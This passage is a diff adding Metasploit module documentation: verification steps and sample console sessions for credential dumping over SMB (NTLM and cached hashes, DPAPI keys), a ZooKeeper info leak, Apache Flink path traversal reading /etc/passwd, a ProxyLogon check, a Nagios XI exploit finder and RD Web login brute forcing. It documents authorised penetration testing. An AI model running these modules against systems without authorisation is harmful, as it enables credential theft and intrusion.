+Hex string: 095aa2cf23a209ee4e557be453985c6c6dcb4100c8184a589515c65698feda7971d843506f23f70bb99750d8b2a44cc943e64523ecec43728c1f50ad52a264924a038ebeb6fc854b65e3d0c766340b1413aee713c8256bf1be55a4fedefa4b1d0af54d68ea3c3b65d169eb705b7d351c97d6e0d115654e52dc1e119e356a82593098e1d2640e2c2b4cdde6fd023621c154e0187ce056ee254babb97570d2cfc9388e06203175ca52d39f6d99809cf1ab5651e3de62bed4bbcef76b9cf58874a7542951473be29b7a
+
+NL$KM
+40 76 27 cd 14 f9 b3 6e a5 19 fd 03 bd c7 d9 99    |@v'....n........|
+f2 b0 91 78 44 80 e7 b3 7d b6 4f 26 0a 61 8c 6f    |...xD...}.O&.a.o|
+c5 20 e2 65 de ef 98 13 92 e8 db c9 51 3b 5a c2    |. .e........Q;Z.|
+fd 19 66 e6 e9 cd 4f 11 ec 08 82 1b 16 be 41 38    |..f...O.......A8|
+Hex string: 407627cd14f9b36ea519fd03bdc7d999f2b091784480e7b37db64f260a618c6fc520e265deef981392e8dbc9513b5ac2fd1966e6e9cd4f11ec08821b16be4138
+
+[*] 192.68.43.12:445 - Decrypting NL$KM
+[*] 192.68.43.12:445 - Dumping cached hashes
+[*] 192.68.43.12:445 - Hashes are in 'mscash2' format
+MYDOMAIN/msfuser:$DCC2$10240#msfuser#86d8081dd11a232080037a83f2165732:MYDOMAIN.INTERNAL:MYDOMAIN
+
+[*] 192.68.43.12:445 - Cleaning up...
+[*] 192.68.43.12:445 - Stopping service RemoteRegistry...
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/windows_secrets_dump) > hosts
+
+Hosts
+=====
+
+address        mac  name             os_name  os_flavor  os_sp  purpose  info  comments
+-------        ---  ----             -------  ---------  -----  -------  ----  --------
+192.68.43.12       MYDESKTOP  Unknown                    device
+
+msf6 auxiliary(gather/windows_secrets_dump) > services
+Services
+========
+
+host           port  proto  name  state  info
+----           ----  -----  ----  -----  ----
+192.68.43.12  445   tcp    smb   open   Module: auxiliary/gather/windows_secrets_dump, last negotiated version: SMBv3 (dialect = 0x0311)
+
+msf6 auxiliary(gather/windows_secrets_dump) > creds
+Credentials
+===========
+
+host          origin        service        public               private                                                                                          realm     private_type        JtR Format
+----          ------        -------        ------               -------                                                                                          -----     ------------        ----------
+192.68.43.12  192.68.43.12  445/tcp (smb)  MYDOMAIN\msfuser     MYDOMAIN/msfuser:$DCC2$10240#msfuser#86d8081dd11a232080037a83f2165732:MYDOMAIN.INTE (TRUNCATED)  MYDOMAIN  Nonreplayable hash  mscash2
+192.68.43.12  192.68.43.12  445/tcp (smb)  Guest                aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0                                          NTLM hash           nt,lm
+192.68.43.12  192.68.43.12  445/tcp (smb)  Administrator        aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0                                          NTLM hash           nt,lm
+192.68.43.12  192.68.43.12  445/tcp (smb)  WDAGUtilityAccount   aad3b435b51404eeaad3b435b51404ee:b7759c83c817e8b0082fb322bce0073b                                          NTLM hash           nt,lm
+192.68.43.12  192.68.43.12  445/tcp (smb)  msfuser              aad3b435b51404eeaad3b435b51404ee:035ad5f5a5c251c6fc3ba367bee86858                                          NTLM hash           nt,lm
+192.68.43.12  192.68.43.12  445/tcp (smb)  MYDOMAIN\MYDESKTOP$  aad3b435b51404eeaad3b435b51404ee:0cb18b83ab17e808b6604175784e8ec2                                MYDOMAIN  NTLM hash           nt,lm
+192.68.43.12  192.68.43.12  445/tcp (smb)  MYDOMAIN\MYDESKTOP$  MYDOMAIN\MYDESKTOP$:aes256-cts-hmac-sha1-96:8f84e173f9a44708b56806e3d5ee9fa4d21c8ed (TRUNCATED)  MYDOMAIN  Password
+192.68.43.12  192.68.43.12  445/tcp (smb)  MYDOMAIN\MYDESKTOP$  MYDOMAIN\MYDESKTOP$:aes128-cts-hmac-sha1-96:324719fca31fb90274acbd0bf07abf00                     MYDOMAIN  Password
+192.68.43.12  192.68.43.12  445/tcp (smb)  MYDOMAIN\MYDESKTOP$  MYDOMAIN\MYDESKTOP$:des-cbc-md5:7561afef18d6e7bb                                                 MYDOMAIN  Password
+192.68.43.12  192.68.43.12  445/tcp (smb)  DefaultAccount       aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0                                          NTLM hash           nt,lm
+
+msf6 auxiliary(gather/windows_secrets_dump) > notes
+
+Notes
+=====
+
+ Time                     Host          Service  Port  Protocol  Type               Data
+ ----                     ----          -------  ----  --------  ----               ----
+ 2020-08-13 12:20:16 UTC  192.68.43.12  smb      445   tcp       host.boot_key      "3d354aa5e14d4360a1cc378a9e47338c"
+ 2020-08-13 12:20:20 UTC  192.68.43.12  smb      445   tcp       host.lsa_key       "0483f343addb39221136da0a0f52397aef02e6ee5d8bd05d49390ab97e05dc45"
+ 2020-08-13 12:20:20 UTC  192.68.43.12  smb      445   tcp       dpapi.machine_key  "a197fe18d264c79b0996b3a987fcd6ea3b6191a6"
+ 2020-08-13 12:20:20 UTC  192.68.43.12  smb      445   tcp       dpapi.user_key     "ab025408f16dc46e6ba79a559751ea4890daf97b"
+ 2020-08-13 12:20:20 UTC  192.68.43.12  smb      445   tcp       host.nlkm_key      "40000000000000000000000000000000407627cd14f9b36ea519fd03bdc7d999f2b091784480e7b37db64f260a618c6fc520e265deef981392e8dbc9513b5ac2fd1966e6e9cd4f11ec08821b16be4138e0dd79c41522331dcc5005d731c1738f"
+ 2020-08-13 12:20:21 UTC  192.68.43.12  smb      445   tcp       user.cache_info    "Username: msfuser; Iteration count: 10 -> real 10240; Last login: 2020-08-01 20:00:02 +0100; DNS Domain Name: MYDOMAIN.INTERNAL; UPN: msfuser@mydomain.internal; Effective Name: msfuser; Full Name: msfuser; Logon Script: ; Profile Path: ; Home Directory: ; Home Directory Drive: ; User ID: 1004; Primary Group ID: 513; Additional groups: 513; Logon domain name: MYDOMAIN"
+```
@@ -0,0 +1,126 @@
+### Description
+
+This module targets Apache ZooKeeper service instances to extract information about the system environment, and service statistics.
+
+### Verification Steps
+
+```
+msf5 > use auxiliary/gather/zookeeper_info_disclosure
+msf5 auxiliary(gather/zookeeper_info_disclosure) > set rhosts 1.3.3.7
+msf5 auxiliary(gather/zookeeper_info_disclosure) > show options
+
+       Name: Apache ZooKeeper Information Disclosure
+     Module: auxiliary/gather/zookeeper_info_disclosure
+    License: Metasploit Framework License (BSD)
+       Rank: Normal
+  Disclosed: 2020-10-14
+
+Provided by:
+  Karn Ganeshen <KarnGaneshen@gmail.com>
+
+Check supported:
+  No
+
+Basic options:
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  RHOSTS   1.3.3.7          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+  RPORT    2181             yes       The target port (TCP)
+  THREADS  1                yes       The number of concurrent threads (max one per host)
+  TIMEOUT  30               yes       Timeout for the probe
+
+Description:
+  Apache ZooKeeper server service runs on TCP 2181 and by default, it 
+  is accessible without any authentication. This module targets Apache 
+  ZooKeeper service instances to extract information about the system 
+  environment, and service statistics.
+
+References:
+  https://zookeeper.apache.org/doc/current/zookeeperAdmin.html
+
+
+msf5 auxiliary(gather/zookeeper_info_disclosure) > run
+
+[*] 1.3.3.7:2181     - Using a timeout of 30...
+[*] 1.3.3.7:2181     - Verifying if service is responsive...
+[+] 1.3.3.7:2181     - Service looks fine. Going ahead with extraction..
+
+[*] 1.3.3.7:2181     - Dumping environment info...
+[+] 1.3.3.7:2181     - Environment:
+zookeeper.version=3.4.9-1757313, built on 08/23/2016 06:50 GMT
+host.name=localhost.localdomain
+java.version=1.8.0_162
+java.vendor=Oracle Corporation
+java.home=/usr/lib/jvm/jdk1.8.0_162/jre
+java.class.path=/var/lib/zookeeper/bin/../build/classes:/var/lib/zookeeper/bin/../build/lib/*.jar:/var/lib/zookeeper/bin/../lib/slf4j-log4j12-1.6.1.jar:/var/lib/zookeeper/bin/../lib/slf4j-api-1.6.1.jar:/var/lib/zookeeper/bin/../lib/netty-3.10.5.Final.jar:/var/lib/zookeeper/bin/../lib/log4j-1.2.16.jar:/var/lib/zookeeper/bin/../lib/jline-0.9.94.jar:/var/lib/zookeeper/bin/../zookeeper-3.4.9.jar:/var/lib/zookeeper/bin/../src/java/lib/*.jar:/var/lib/zookeeper/bin/../conf:
+java.library.path=/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib
+java.io.tmpdir=/tmp
+java.compiler=<NA>
+os.name=Linux
+os.arch=amd64
+os.version=3.10.62-ltsi
+user.name=root
+user.home=/root/
+user.dir=/opt/data/zookeeper
+
+[+] 1.3.3.7:2181       - File saved in: /root/.msf4/loot/20201013203537_default_1.3.3.7_environlog_604018.txt 
+
+[*] 1.3.3.7:2181       - Dumping statistics about performance and connected clients...
+[+] 1.3.3.7:2181       - Zookeeper version: 3.4.9-1757313, built on 08/23/2016 06:50 GMT
+Clients:
+ /1.3.3.6:33935[0](queued=0,recved=1,sent=0)
+ /1.3.3.13:39682[1](queued=0,recved=526446,sent=526446)
+ /1.3.3.12:60371[1](queued=0,recved=526234,sent=526279)
+ /1.3.3.12:60373[1](queued=0,recved=596717,sent=596727)
+ /1.3.3.13:51193[1](queued=0,recved=78915,sent=78917)
+ /1.3.3.13:49457[1](queued=0,recved=538585,sent=540938)
+
+Latency min/avg/max: 0/0/20
+Received: 2267148
+Sent: 2269515
+Connections: 6
+Outstanding: 0
+Zxid: 0x300000c6c
+Mode: follower
+Node count: 1041
+
+[+] 1.3.3.7:2181       - File saved in: /root/.msf4/loot/20201013203537_default_1.3.3.7_statlog_417795.txt
+
+[*] 1.3.3.7:2181       - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+
+msf5 auxiliary(gather/zookeeper_info_disclosure) > 
+msf5 auxiliary(gather/zookeeper_info_disclosure) > loot
+
+Loot
+====
+
+host           service  	type         	name             content     	info       path
+----           -------  	----         	----             -------    	----       ----
+1.3.3.7        environ-log  	ZooKeeper 	Environment Log  text/plain  	ZooKeeper  /root/.msf4/loot/20201013203537_default_1.3.3.7_environlog_604018.txt 
+1.3.3.7        stat-log     	ZooKeeper 	Stat Log         text/plain  	ZooKeeper  /root/.msf4/loot/20201013203537_default_1.3.3.7_statlog_417795.txt
+
+
+msf5 auxiliary(gather/zookeeper_info_disclosure) > services 
+Services
+========
+
+host       port  proto  name       state  info
+----       ----  -----  ----       -----  ----
+1.3.3.7    2181  tcp    zookeeper  open   Apache Zookeeper: 3.4.13-2--1
+
+msf5 auxiliary(gather/zookeeper_info_disclosure) > hosts
+
+Hosts
+=====
+
+address        mac   name        os_name  os_flavor  os_sp  purpose  info  comments
+-------        ---   ----        -------  ---------  -----  -------  ----  --------
+1.3.3.7              localhost   Linux    device                           Linux amd64 3.10.0-1062.12.1.el7.x86_64
+
+
+```
+
+
+
@@ -0,0 +1,105 @@
+## Vulnerable Application
+
+This module exploits an unauthenticated directory traversal vulnerability
+in [Apache Flink](https://flink.apache.org) versions 1.11.0 <= 1.11.2.
+
+The JobManager REST API fails to validate user-supplied log file paths,
+allowing retrieval of arbitrary files with the privileges of the web server user.
+
+This module has been tested successfully on:
+
+* Apache Flink version 1.11.2 on Ubuntu 18.04.4.
+
+## Verification Steps
+
+```sh
+wget 'https://archive.apache.org/dist/flink/flink-1.11.2/flink-1.11.2-bin-scala_2.11.tgz'
+tar zxvf flink-1.11.2-bin-scala_2.11.tgz
+cd flink-1.11.2/
+./bin/start-cluster.sh
+```
+
+Metasploit:
+
+1. `./msfconsole`
+1. `use auxiliary/scanner/http/apache_flink_jobmanager_traversal`
+1. `set rhosts <rhost>`
+1. `set filepath <file path>`
+1. `run`
+
+## Options
+
+### FILEPATH
+
+The path to the file to read (Default: `/etc/passwd`)
+
+### DEPTH
+
+Depth for path traversal (Default: `10`)
+
+## Scenarios
+
+### Apache Flink version 1.11.2 on Ubuntu 18.04.4
+
+```
+msf6 > use auxiliary/scanner/http/apache_flink_jobmanager_traversal 
+msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > set rhosts 172.16.191.195
+rhosts => 172.16.191.195
+msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > check
+[*] 172.16.191.195:8081 - The target appears to be vulnerable. Apache Flink version 1.11.2 appears vulnerable.
+msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > set filepath /etc/passwd
+filepath => /etc/passwd
+msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > run
+
+[*] Downloading /etc/passwd ...
+[+] Downloaded /etc/passwd (2401 bytes)
+[+] File /etc/passwd saved in: /root/.msf4/loot/20210216114934_default_172.16.191.195_apache.flink.job_754087.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > cat /root/.msf4/loot/20210216114934_default_172.16.191.195_apache.flink.job_754087.txt
+[*] exec: cat /root/.msf4/loot/20210216114934_default_172.16.191.195_apache.flink.job_754087.txt
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
+systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
+syslog:x:102:106::/home/syslog:/usr/sbin/nologin
+messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
+_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
+uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
+avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
+usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
+rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
+cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
+speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
+whoopsie:x:112:117::/nonexistent:/bin/false
+kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
+saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
+pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
+avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
+colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
+hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
+geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
+gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
+gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
+user:x:1000:1000:user,,,:/home/user:/bin/bash
+msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > 
+```
+
@@ -0,0 +1,62 @@
+## Vulnerable Application
+
+CVE-2021-28855 is a pre-authentication SSRF (Server Side Request Forgery) which allows an attacker to
+bypass authentication by sending specially crafted HTTP requests. This vulnerability is part of an attack
+chain used to perform an RCE (Remote Code Execution).
+
+This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013,
+Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).
+
+### Introduction
+
+An issue was discovered in Microsoft Exchange Server that allows an attacker bypassing the authentication and
+impersonating as the admin (CVE-2021-26855). By chaining this bug with another post-auth arbitrary-file-write
+vulnerability to get code execution (CVE-2021-27065).
+
+As a result, an unauthenticated attacker can execute arbitrary commands on Microsoft Exchange Server.
+
+All components are vulnerable by default.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/scanner/http/exchange_proxylogon`
+3. Do: `set RHOSTS [IP]`
+4. Do: `run`
+
+## Options
+
+### METHOD
+
+HTTP Method to use for the check (only). Default: POST
+
+## Scenarios
+
+```
+msf6 auxiliary(scanner/http/exchange_proxylogon) > options 
+
+Module options (auxiliary/scanner/http/exchange_proxylogon):
+
+   Name     Current Setting      Required  Description
+   ----     ---------------      --------  -----------
+   METHOD   POST                 yes       HTTP Method to use for the check. (Accepted: GET, POST)
+   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   172.20.2.110         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT    443                  yes       The target port (TCP)
+   SSL      true                 no        Negotiate SSL/TLS for outgoing connections
+   THREADS  1                    yes       The number of concurrent threads (max one per host)
+   VHOST                         no        HTTP server virtual host
+
+msf6 auxiliary(scanner/http/exchange_proxylogon) > run
+
+[+] https://172.20.2.110:443 - The target is vulnerable to CVE-2021-26855.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/exchange_proxylogon) > 
+```
+
+## References
+
+1. <https://proxylogon.com/>
+2. <https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse>
+3. <https://aka.ms/exchangevulns>
@@ -0,0 +1,173 @@
+## Vulnerable Application
+
+The module detects the version of Nagios XI running on a target and suggests matching exploit modules based on the version number.
+
+The module takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to
+authenticate to the target and obtain the version number, which is only revealed to authenticated users.
+
+When used to target a specific host, the module requires valid credentials for a Nagios XI account.
+These can be provided via `USERNAME` and `PASSWORD` options.
+
+Alternatively, it is possible to provide a specific Nagios XI version number via the `VERSION` option.
+In that case, the module simply suggests matching exploit modules and does not probe the target(s).
+
+The module is able to recommend the following modules based on the target's Nagios XI version:
+- exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce (CVE-2019-15949)
+- exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce (CVE-2020-35578)
+- exploit/linux/http/nagios_xi_mibs_authenticated_rce (CVE-2020-5791)
+- exploit/linux/http/nagios_xi_snmptrap_authenticated_rce (CVE-2020-5792)
+
+### Setting up Nagios XI for testing
+
+Vulnerable Nagios XI versions are available [here](https://assets.nagios.com/downloads/nagiosxi/versions.php).
+Detailed installation instructions are available
+[here](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf)
+and an official video tutorial is available [here](https://www.youtube.com/watch?v=fBWA6t6dJ4I).
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use auxiliary/scanner/http/nagios_xi_scanner`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set USERNAME [username for a valid Nagios XI account]`
+5. Do: `set PASSWORD [password for a valid Nagios XI account]`
+6. Do: `run`
+
+## Options
+### FINISH_INSTALL
+If this is set to `true`, the module will try to finish installing Nagios XI on targets where the installation has not been completed.
+This includes signing the license agreement. The default value is `false`.
+### PASSWORD
+The password for the Nagios XI account to authenticate with.
+### TARGETURI
+The base path to Nagios XI. The default value is `/nagiosxi/`.
+### USERNAME
+The username for the Nagios XI account to authenticate with. The default value is `nagiosadmin`.
+### VERSION
+The Nagios XI version to check against existing exploit modules. If this option is selected,
+the module will not probe the target, so it is not necessary to provide credentials.
+
+## Scenarios
+### Nagios XI 5.6.5 running on CentOS 7
+```
+msf6 > use auxiliary/scanner/http/nagios_xi_scanner 
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > set rhosts 192.168.1.14
+rhosts => 192.168.1.14
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > set password nagiosadmin
+password => nagiosadmin
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > show options 
+
+Module options (auxiliary/scanner/http/nagios_xi_scanner):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
+                                              . This includes signing the license agreement.
+   PASSWORD        nagiosadmin      no        Password to authenticate with
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS          192.168.1.14     yes       The target host(s), range CIDR identifier, or hosts file with synt
+                                              ax 'file:<path>'
+   RPORT           80               yes       The target port (TCP)
+   SSL             false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
+   THREADS         1                yes       The number of concurrent threads (max one per host)
+   USERNAME        nagiosadmin      no        Username to authenticate with
+   VERSION                          no        Nagios XI version to check against existing exploit modules
+   VHOST                            no        HTTP server virtual host
+
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > run
+
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.6.5
+[+] The target appears to be vulnerable to the following 4 exploit(s):
+[*] 
+[*]     CVE-2019-15949  exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb
+[*]     CVE-2020-35578  exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
+[*]     CVE-2020-5792   exploit/linux/http/nagios_xi_snmptrap_authenticated_rce
+[*]     CVE-2020-5791   exploit/linux/http/nagios_xi_mibs_authenticated_rce
+[*] 
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+```
+### Nagios XI 5.7.9 version provided via VERSION
+```
+msf6 > use auxiliary/scanner/http/nagios_xi_scanner 
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > set rhosts 192.168.1.14
+rhosts => 192.168.1.14
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > set version 5.7.9
+version => 5.7.9
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > show options 
+
+Module options (auxiliary/scanner/http/nagios_xi_scanner):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
+                                              . This includes signing the license agreement.
+   PASSWORD                         no        Password to authenticate with
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS          192.168.1.14     yes       The target host(s), range CIDR identifier, or hosts file with synt
+                                              ax 'file:<path>'
+   RPORT           80               yes       The target port (TCP)
+   SSL             false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
+   THREADS         1                yes       The number of concurrent threads (max one per host)
+   USERNAME        nagiosadmin      no        Username to authenticate with
+   VERSION         5.7.9            no        Nagios XI version to check against existing exploit modules
+   VHOST                            no        HTTP server virtual host
+
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > run
+
+[+] Version 5.7.9 matches the following 1 exploit(s):
+[*] 
+[*]     CVE-2020-35578  exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
+[*] 
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+### Nagios XI 5.7.5 - incomplete installation, FINISH_INSTALL set to true
+```
+msf6 > use auxiliary/scanner/http/nagios_xi_scanner 
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > set rhosts 192.168.1.16
+rhosts => 192.168.1.16
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > set password nagiosadmin
+password => nagiosadmin
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > set finish_install true
+finish_install => true
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > show options 
+
+Module options (auxiliary/scanner/http/nagios_xi_scanner):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FINISH_INSTALL  true             no        If the Nagios XI installation has not been completed, try to do so
+                                              . This includes signing the license agreement.
+   PASSWORD        nagiosadmin      no        Password to authenticate with
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS          192.168.1.16     yes       The target host(s), range CIDR identifier, or hosts file with synt
+                                              ax 'file:<path>'
+   RPORT           80               yes       The target port (TCP)
+   SSL             false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
+   THREADS         1                yes       The number of concurrent threads (max one per host)
+   USERNAME        nagiosadmin      no        Username to authenticate with
+   VERSION                          no        Nagios XI version to check against existing exploit modules
+   VHOST                            no        HTTP server virtual host
+
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > run 
+[*] Attempting to authenticate to Nagios XI...   
+[!] The target seems to be a Nagios XI application that has not been fully installed yet.
+[*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
+[*] Attempting to authenticate to Nagios XI...
+[!] The Nagios XI license agreement has not yet been signed on the target.
+[*] Attempting to sign the Nagios XI license agreement... 
+[*] Attempting to authenticate to Nagios XI...
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.7.5
+[+] The target appears to be vulnerable to the following 1 exploit(s):
+[*] 
+[*]     CVE-2020-35578  exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
+[*] 
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,94 @@
+## Vulnerable Application
+
+The Microsoft RD Web login is vulnerable to the same type of authentication username enumeration vulnerability
+that is present for OWA. By analyzing the time it takes for a failed response, the RDWeb interface can be used
+to quickly test the validity of a set of usernames. The module additionally supports testing username password
+combinations. Additionally, this module can attempt to discover the target NTLM domain if you don't already know it.
+This module also reports credentials to the credentials database when they are discovered.
+
+## Verification Steps
+
+
+- [ ] Start `msfconsole`
+- [ ] `use auxiliary/scanner/http/rdp_web_login`
+- [ ] `set rhost TARGET_IP`
+- [ ] `set username USER_OR_FILE`
+- [ ] `set password PASSWORD_OR_FILE` (Only if you want to test the password brute forcing)
+- [ ] `set domain DOMAIN` (Only if you don't want to test the domain discovery feature)
+- [ ] Check output for validity of your test username(s), password(s), and domain
+
+
+## Options
+
+### domain
+
+The target domain to use for the username checks. If not provided, enum_domain needs to be set to true so it can be discovered.
+
+### enum_domain
+
+Enumerate the domain by using an NTLM challenge/response and parsing the AD Domain out.
+
+### username
+
+Either a specific username to verify or a file with one username per line to verify.
+
+### password
+
+Either a specific password to attempt or a file with one password per line to verify.
+If not provided, uses the same None password for all requests
+
+### verify_service
+
+Whether or not to verify that RDWeb is installed prior to scanning. Defaults to true.
+
+### user_agent
+
+An alternate User Agent string to use in HTTP requests. Defaults to Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0.
+
+## Scenarios
+If an RDWeb login page is discovered, you can use this module to gather valid usernames for a brute force attack.
+
+Specific target output replaced with Ys so as not to disclose information
+```msf6 > use auxiliary/scanner/http/rdp_web_login
+msf6 auxiliary(scanner/http/rdp_web_login) > set username /home/kali/users.txt
+username => /home/kali/users.txt
+msf6 auxiliary(scanner/http/rdp_web_login) > set RHOSTS YY.YYY.YYY.YY
+RHOSTS => YY.YYY.YYY.YY
+msf6 auxiliary(scanner/http/rdp_web_login) > run
+
+[*] Running for YY.YYY.YYY.YY...
+[+] Found Domain: YYYYYYYYYYYY
+[-] Username YYYYYYYYYYYY\wrong is invalid! No response received in 1250 milliseconds
+[+] Username YYYYYYYYYYYY\YYYYY is valid! Response received in 628.877 milliseconds
+[-] Username YYYYYYYYYYYY\k0pak4 is invalid! No response received in 1250 milliseconds
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed```
+
+If an RDWeb login page is discovered, you can use this module to perform a brute force attack.
+```msf6 > use auxiliary/scanner/http/rdp_web_login
+msf6 auxiliary(scanner/http/rdp_web_login) > set RHOSTS 192.168.148.128
+RHOSTS => 192.168.148.128
+msf6 auxiliary(scanner/http/rdp_web_login) > set username /home/kali/users.txt
+username => /home/kali/users.txt
+msf6 auxiliary(scanner/http/rdp_web_login) > set password /home/kali/passwords.txt
+password => /home/kali/passwords.txt
+msf6 auxiliary(scanner/http/rdp_web_login) > set timeout 500
+timeout => 500
+msf6 auxiliary(scanner/http/rdp_web_login) > run
+
+[*] Running for YY.YYY.YYY.YY...
+[+] Found Domain: YYYY
+[-] Login YYYY\wrong:password is invalid! No response received in 500 milliseconds
+[-] Login YYYY\wrong:Password1! is invalid! No response received in 500 milliseconds
+[+] Password password is invalid but YYYY\k0pak4 is valid! Response received in 155.648 milliseconds
+[+] Login YYYY\k0pak4:Password1! is valid!
+[+] Password password is invalid but YYYY\Administrator is valid! Response received in 77.852 milliseconds
+[+] Password Password1! is invalid but YYYY\Administrator is valid! Response received in 76.029 milliseconds
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed```
+
